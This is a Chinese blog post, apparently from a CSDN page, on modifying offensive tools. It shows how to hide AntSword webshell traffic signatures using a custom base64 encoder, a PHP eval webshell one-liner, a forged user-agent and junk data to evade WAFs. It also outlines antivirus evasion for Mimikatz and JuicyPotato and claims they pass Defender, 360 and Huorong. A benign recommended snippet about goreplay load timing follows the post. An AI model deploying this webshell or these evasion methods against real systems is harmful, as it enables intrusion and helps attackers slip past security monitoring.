一些工具改造

前言:摸鱼玩了几天是真的玩的那种笑死 啥都没学
本来说大前天就把这玩意整完的 几天就干了一点事情
其中cs的一些东西和frp改造还没玩明白 不过暂时就这样吧 内核的很多还是玩不明白 先放着吧以后在学了
摸鱼玩其他的去了
image.png

正文:

蚁剑隐藏特征+自定义编码器

正常蚁剑的几个特征

①user-agent流量特征
image.png
②shellcode未加密流量特征
后面补的所有上面的useragent已经被改了
image.png

改造

①shellcode未加密流量特征思路

一个编码项目
https://codeload.github.com/xiaopan233/AntSword-Cryption-WebShell/zip/refs/heads/main

base64思路

image.png
这里以最基础的base64加密为例
新加一个编码器 然后内容如下即可

/**
 * php::base64编码器
 * Create at: 2018/12/29 09:12:22
 */

'use strict';

/*
* @param  {String} pwd   连接密码
* @param  {Array}  data  编码器处理前的 payload 数组
* @return {Array}  data  编码器处理后的 payload 数组
*/
module.exports = (pwd, data) => {
    data[pwd] = new Buffer(data['_']).toString('base64');
  delete data['_'];
  // 返回编码器处理后的 payload 数组
  return data;
}

shellcode代码

<?php @eval(base64_decode($_POST['code'])); ?>
蚁剑自带rsa加密

image.png
copy php代码然后正常连接即可
image.png
然后把shellcode扔服务器上 然后进行配置编码器设置为我们设置的那个即可
image.png
image.png

②更改user-agent

更改module文件下的 这两个文件内容即可
image.png
image.png
改成我们想伪造的即可 然后重启即可
image.png

③其余自选功能

加点垃圾数据和分块这些去过一些垃圾waf
这样一来神仙都难说是
image.png
image.png
这个去配置urlblacklist 把要过滤的删了改了即可
image.png

猕猴桃免杀

这里只分享思路 不放东西
将猕猴桃的exe做个简单免杀然后转shellcode 然后就变成我们常规使用的分离加载以及编码加解密shellcode免杀的思路了
image.png

有人说猕猴桃走源码免杀
不是说不可以 但是咋说呢 耗时间 特征定位耗费一堆时间哪怕用myccl去做特征定位 我也觉得蛮耗时间的 而且特征这块火绒杀的蛮死的 对我来说能转换为其他思路做就绝不用这种

没开启样本上传的360倒是可以不杀
image.png

juicepotao免杀

这种其实也可以转shellcode然后走分离 但是考虑到具体版本clsid不灵活的特点
我这里没想出其他的多好的思路,还是走的源码免杀 就是常规的替换参数替换资源混淆代码执行逻辑
效果如下
wdf+360+火绒全过
image.png

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
流量回放工具goreplay是一个开源的工具,它可以用来记录和回放HTTP/HTTPS流量。如果你想要进行压测并统计结果,可以对goreplay进行一些改造。 首先,你需要安装goreplay并启动它来进行流量录制和回放。然后,你可以使用一个脚本来发送请求并记录响应时间。以下是一个示例脚本: ```bash #!/bin/bash while read line; do url=$(echo $line | cut -d ' ' -f 2) time=$(curl -o /dev/null -s -w %{time_total} $url) echo $time >> response_times.log done < urls.txt ``` 这个脚本从一个名为urls.txt的文件中读取URL,并使用curl发送请求并记录响应时间。响应时间被写入response_times.log文件中。 一旦你有了响应时间的记录,你可以使用其他工具来进行统计和分析。例如,你可以使用awk命令来计算平均响应时间: ```bash awk '{sum+=$1} END {print "Average response time: " sum/NR "s"}' response_times.log ``` 这个命令将response_times.log文件中的所有响应时间相加,然后除以记录数来计算平均响应时间。 你也可以使用其他工具,如Grafana、Prometheus和InfluxDB等来可视化和分析数据。例如,你可以使用Grafana来创建一个响应时间的实时监控面板。 改造goreplay支持压测统计是可行的,但需要一定的技术水平和时间投入。你需要了解golang和HTTP/HTTPS协议,并对goreplay的代码进行修改。如果你需要更加专业的支持,可以考虑向goreplay的开发团队寻求帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

goddemon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值